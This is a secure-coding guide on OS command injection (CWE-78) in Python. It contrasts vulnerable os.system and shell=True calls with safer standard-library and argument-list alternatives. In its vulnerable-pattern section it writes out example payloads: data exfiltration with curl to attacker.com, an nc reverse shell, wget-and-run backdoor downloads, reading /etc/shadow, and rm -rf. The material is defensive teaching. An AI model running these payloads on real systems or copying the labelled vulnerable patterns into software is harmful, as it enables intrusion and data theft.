CWE-78: OS Command Injection - Python

Overview

OS Command Injection occurs when an application incorporates untrusted data into an operating system command without proper validation or sanitization. Attackers can execute arbitrary commands on the host operating system.

Primary Defence: Use Python standard-library modules or maintained Python packages (pathlib, shutil, requests, zipfile, etc.) instead of system commands, or if unavoidable, use subprocess.run() with argument lists and shell=False. Avoid launching shell scripts or batch files with untrusted arguments; platform-specific shell parsing can reappear even when your Python code does not explicitly request a shell.

Remediation Strategy

PRIMARY FIX - Avoid System Calls

Use Python native libraries instead of executing commands

This eliminates the vulnerability entirely
Do NOT use subprocess or os.system() if a Python library exists

SECONDARY FIX - Use subprocess.run() with Argument List

Set shell=False, pass arguments as list

WARNING: Only use if Priority 1 is not possible
Must use list of arguments with shell=False (CRITICAL)

Defense in Depth - Input Validation

Allowlist permitted characters

Required in addition to Priority 1 or 2
Never use validation alone

Additional Hardening - Least Privilege

Drop privileges, use resource limits

Apply alongside other fixes

Decision Tree

Need to execute OS command?
├─ Is there a Python library alternative? (pathlib, shutil, requests, etc.)
│  ├─ YES → Use Python library (Priority 1) - PREFERRED SOLUTION
│  └─ NO → Continue
│
├─ Can you use subprocess.run() with argument list?
│  ├─ YES → Use subprocess.run(['cmd', 'arg1', 'arg2'], shell=False) (Priority 2)
│  └─ NO → Re-evaluate if command is truly necessary
│
└─ For ALL solutions:
   ├─ Add input validation (Priority 3)
   └─ Apply least privilege (Priority 4)

Common Vulnerable Patterns

String Concatenation with os.system()

# VULNERABLE - Command injection via string concatenation

filename = request.GET['file']
os.system('ls -la ' + filename)

# Attack example:
# Input: "file.txt; rm -rf /tmp/*"
# Result: Deletes all files in /tmp

Why this is vulnerable: os.system() executes commands through the shell, allowing attackers to inject shell metacharacters like ;, |, &&, or $() to chain commands such as ; rm -rf / or | nc attacker.com 4444 -e /bin/sh, achieving arbitrary code execution.

Using subprocess with shell=True

# VULNERABLE - Shell command injection

user_input = request.GET['path']
subprocess.run(f'cat {user_input}', shell=True)

# Attack example:
# Input: "file.txt | curl attacker.com?data=$(cat /etc/passwd)"
# Result: Exfiltrates password file

subprocess.Popen with Shell Invocation

# VULNERABLE - Invoking shell allows command injection

ip = request.GET['ip']
subprocess.Popen(f'ping -c 4 {ip}', shell=True)

# Attack example:
# Input: "8.8.8.8 && cat /etc/shadow > /tmp/pwned"
# Result: Executes additional commands

Why this is vulnerable: subprocess.Popen with shell=True passes the command to the shell, allowing injection of shell operators like &&, ||, or ; to execute arbitrary commands such as && wget http://evil.com/backdoor.sh -O- | sh, creating backdoors or stealing data.

Unvalidated Input in subprocess.call()

# VULNERABLE - No input validation with shell=True

user_file = request.POST['filepath']
subprocess.call('grep pattern ' + user_file, shell=True)

# Attack example:
# Input: "data.txt; wget http://attacker.com/malware.sh -O /tmp/m.sh; python /tmp/m.sh"
# Result: Downloads and executes malware

Why this is vulnerable: subprocess.call() with shell=True and no validation allows attackers to inject shell metacharacters like ; to chain commands, download malicious scripts with wget or curl, and execute them, compromising the entire system.

Secure Patterns

Use Python Native Libraries (PREFERRED - Eliminates Command Injection)

# SECURE - Use pathlib and os modules instead of OS commands

from pathlib import Path
import os

directory = Path('/uploads')
for file_path in directory.iterdir():
    stat = file_path.stat()
    print(f"{file_path.name} {stat.st_size} {stat.st_mtime}")

# More file operations

import shutil
content = Path(filepath).read_text()           # Instead of "cat"
shutil.copy(source, dest)                      # Instead of "cp"
Path(path).mkdir(parents=True, exist_ok=True)  # Instead of "mkdir -p"
Path(filepath).unlink()                        # Instead of "rm"

Why this works: Python's pathlib and shutil modules operate directly on the filesystem through the Python runtime without invoking shell commands. This completely eliminates command injection vulnerabilities - there's no OS process to execute, no shell to interpret metacharacters like ;, |, or &&, and no possibility of command chaining. These functions are also more portable across operating systems than system commands.

Use requests Library for Network Operations

# SECURE - Use requests instead of wget/curl commands

import requests

response = requests.get(url, timeout=30)
content = response.content

# For downloads

with requests.get(url, stream=True, timeout=30) as r:
    r.raise_for_status()
    with open('download.file', 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)

Why this works: The requests library performs network operations through pure Python code without executing wget, curl, or other command-line utilities. By eliminating process execution entirely, there's no attack surface for command injection - malicious URLs or parameters cannot escape into shell commands because no shell is ever invoked. The timeout parameter also prevents denial of service through hanging connections.

Use tarfile/zipfile for Archives

# SECURE - Use tarfile extraction filters instead of tar commands

import tarfile
from pathlib import Path

with tarfile.open(archive, 'r:gz') as tar:
    # Python 3.12+: data filter blocks absolute paths, outside-destination
    # paths, dangerous links, and special files.
    tar.extractall(path='./extracted', filter='data')

# For ZIP files

import zipfile
from pathlib import Path

destination = Path('./extracted').resolve()
with zipfile.ZipFile(archive, 'r') as zip_ref:
    for member in zip_ref.namelist():
        target = (destination / member).resolve()
        if not target.is_relative_to(destination):
            raise ValueError(f'Unsafe archive member: {member}')
        if Path(member).is_absolute():
            raise ValueError(f'Unsafe archive member: {member}')
    zip_ref.extractall(destination)

Why this works: Python's tarfile and zipfile modules handle archive operations without calling external tar, unzip, or 7z commands, so archive names cannot become shell syntax. For tar archives, Python 3.12+ extraction filters provide the important safety boundary: filter='data' rejects absolute paths, entries that would extract outside the destination, dangerous hardlinks/symlinks, and special files. For zip archives, resolving each destination path and checking is_relative_to(destination) prevents zip-slip traversal even when paths contain nested .. components. These archive checks address filesystem escape risks; they are separate from command injection prevention.

For older Python versions without tar extraction filters, do not extract untrusted tar files unless you implement equivalent checks for paths, links, special files, file count, and extracted size. Even with filter='data', extract untrusted archives into a new temporary directory and apply resource limits to reduce denial-of-service risk.

Use re Module for Text Processing

# SECURE - Use re module instead of grep commands

import re
from pathlib import Path

content = Path(filepath).read_text()
matches = re.findall(pattern, content)

# Line-by-line processing

with open(filepath) as f:
    matching_lines = [line for line in f if search_term in line]

Why this works: Python's re module and file I/O operations provide powerful text processing capabilities without executing grep, sed, awk, or other shell utilities. Processing text in-memory through Python prevents command injection while offering better performance, type safety, and cross-platform compatibility. List comprehensions and regex operations are also more maintainable than complex shell pipelines.

subprocess.run() with Argument List (If Process Execution Required)

WARNING: Avoid executing OS commands if at all possible. Python has native libraries for almost everything (requests, pathlib, zipfile, etc.). This pattern is ONLY for cases where no Python library exists (e.g., calling a legacy third-party binary). Always exhaust all native alternatives first.

# USE WITH CAUTION - When process execution is unavoidable, use argument list

import subprocess
import ipaddress

ip_address = request.GET['ip']

# Validate input first
try:
    ipaddress.ip_address(ip_address)
except ValueError:
    raise ValueError('Invalid IP address')

# Use list of arguments - NO SHELL
result = subprocess.run(
    ['ping', '-c', '4', ip_address],  # Arguments as list
    capture_output=True,
    text=True,
    shell=False,  # CRITICAL: shell=False
    timeout=10
)

print(result.stdout)

Why this works: Using subprocess.run() with arguments as a list and shell=False passes each argument directly to the executable without Python invoking /bin/sh or cmd.exe. Even if ip_address contains shell metacharacters like ; or &&, they are treated as literal argument data rather than command separators. Input validation provides defense-in-depth by rejecting malformed inputs before they reach subprocess. On Windows, avoid launching .bat or .cmd files with untrusted arguments; Python documents platform-specific cases where batch files may still be processed by a system shell.

subprocess.run() with Path Validation (For File Operations)

WARNING: Use Python's pathlib, shutil, or os modules instead of subprocess for file operations. Only use subprocess for operations with no Python equivalent (e.g., calling external compression tools).

For file operations requiring subprocess - always validate paths.

# AVOID IF POSSIBLE - Validate paths before use

filename = request.GET['file']

# Validate filename
if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
    raise ValueError('Invalid filename')

# Better: Use pathlib instead of subprocess
base_dir = Path('/uploads').resolve()
file_path = (base_dir / filename).resolve()
if not file_path.is_relative_to(base_dir):
    raise ValueError('Path traversal detected')

content = file_path.read_text()

Why this works: Using Path.resolve() and is_relative_to() ensures the resolved absolute path stays within the intended directory, preventing path traversal attacks through ../ sequences. The regex validation creates an allowlist of permitted filename characters, blocking shell metacharacters. However, the example emphasizes using pathlib's native file operations (read_text()) instead of subprocess entirely - this is the most secure approach because it avoids process execution altogether.

Input Validation (Defense in Depth)

Allowlist Validation

import re

def validate_filename(filename):
    """Only allow alphanumeric, underscore, dash, dot"""
    if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
        raise ValueError('Invalid filename characters')
    return filename

def validate_ip_address(ip):
    """Validate IPv4 format"""
    import ipaddress
    try:
        ipaddress.IPv4Address(ip)
        return ip
    except ValueError:
        raise ValueError('Invalid IP address')

Framework-Specific Guidance

Django/Flask Integration

# Django view with validation

import ipaddress

def ping_view(request):
    ip_address = request.GET.get('ip', '')

    try:
        ipaddress.ip_address(ip_address)
    except ValueError:
        return HttpResponseBadRequest('Invalid IP')

    # Safe to use with subprocess
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False
    )
    return HttpResponse(result.stdout)

shlex for Argument Parsing (Use Carefully)

import shlex
import subprocess

# Only use shlex.split() for parsing TRUSTED input
# NOT for untrusted user input directly in commands
# Safe: parsing trusted command template

cmd_template = 'ping -c 4'
args = shlex.split(cmd_template)
args.append(validated_ip)  # Append validated user input
subprocess.run(args, shell=False)

# NEVER do this:
# user_input = request.GET['cmd']
# args = shlex.split(user_input)  # Still vulnerable!
# subprocess.run(args, shell=False)

Security Best Practices

Use Timeout

try:
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False,
        timeout=10  # Prevent hanging
    )
except subprocess.TimeoutExpired:
    # Handle timeout
    pass

Limit Resource Usage

import resource

def limit_process_resources():
    """Limit CPU and memory for subprocess"""
    def set_limits():
        # Limit CPU time to 30 seconds
        resource.setrlimit(resource.RLIMIT_CPU, (30, 30))
        # Limit memory to 128MB
        resource.setrlimit(resource.RLIMIT_AS, (128 * 1024 * 1024, 
                                                  128 * 1024 * 1024))

    return set_limits

# Use preexec_fn only in simple Unix subprocess launchers.
# In threaded web applications, prefer OS/container/cgroup limits or a worker wrapper.

subprocess.run(
    ['ping', '-c', '4', ip_address],
    preexec_fn=limit_process_resources(),
    shell=False
)

Drop Privileges (Unix)

import os
import pwd

def drop_privileges(username='nobody'):
    """Drop privileges to specified user"""
    def set_user():
        pw_record = pwd.getpwnam(username)
        os.setgid(pw_record.pw_gid)
        os.setuid(pw_record.pw_uid)
    return set_user

# Run subprocess as unprivileged user

subprocess.run(
    ['command'],
    preexec_fn=drop_privileges('nobody'),
    shell=False
)

Deprecated/Dangerous Functions to Avoid

# NEVER USE THESE:

os.system(cmd)              # Always uses shell
os.popen(cmd)               # Uses shell; prefer subprocess without shell
commands.getoutput(cmd)     # Removed in Python 3
subprocess.call(cmd, shell=True)
subprocess.Popen(cmd, shell=True)

# ALWAYS USE:

subprocess.run([...], shell=False)
subprocess.check_output([...], shell=False)

Remediation Steps

Locate each command sink: os.system(), os.popen(), subprocess.* with shell=True, string commands passed to subprocess, or wrappers that call these APIs.
Identify the operation being performed and replace it with a Python API when one exists, such as pathlib, shutil, zipfile, tarfile, re, or a maintained network library.
If process execution is unavoidable, pass an argument list with shell=False, set a timeout, and avoid batch or shell scripts for untrusted arguments.
Validate each argument using a type-specific parser such as ipaddress, Path resolution within an allowlisted base directory, or an allowlist for simple filenames.
Remove fallback paths that still construct command strings, including debug/admin paths and error-handling branches.
Add operational hardening such as low-privilege users, container or OS resource limits, controlled working directories, and restricted environment variables.

Testing

Test normal values for each argument, including valid filenames, paths, IP addresses, and URLs expected by the feature.
Test shell metacharacters such as ;, &&, |, backticks, $(), redirects, quotes, and newlines.
Test argument injection values such as filenames beginning with - or values that could become extra flags.
Test Windows and Unix behavior separately when the application is cross-platform, especially for .bat or .cmd launchers.
Verify invalid input fails before subprocess execution and returns a controlled error.
Re-run static analysis tools such as Bandit and add regression tests around the wrapper or service function that launches processes.

Common Pitfalls

Passing a list to subprocess.run() but also setting shell=True.
Using shlex.split() on untrusted user input and treating the result as safe.
Validating with a denylist of shell metacharacters while still invoking a shell.
Using regex-only IP validation that accepts invalid addresses; use ipaddress for IP values.
Replacing a command injection bug with path traversal by passing unvalidated filenames into file operations.
Relying on timeouts, dropped privileges, or resource limits as the primary fix instead of removing shell interpretation.

Dependencies and Installation

pathlib, shutil, subprocess, zipfile, tarfile, ipaddress, and re are in the Python standard library.
requests is a third-party package for HTTP operations; keep it current through the project's dependency manager.
Bandit can help detect dangerous subprocess patterns, but manual review is still needed to confirm whether data is untrusted and whether shell=True or string commands are reachable.

Additional Resources

Bandit Security Linter - Detects subprocess issues
CWE-78 Definition
OWASP Command Injection
Python Requests Library
Python pathlib Module
Python shutil Module
Python subprocess Documentation
Python tarfile Module
Python zipfile Module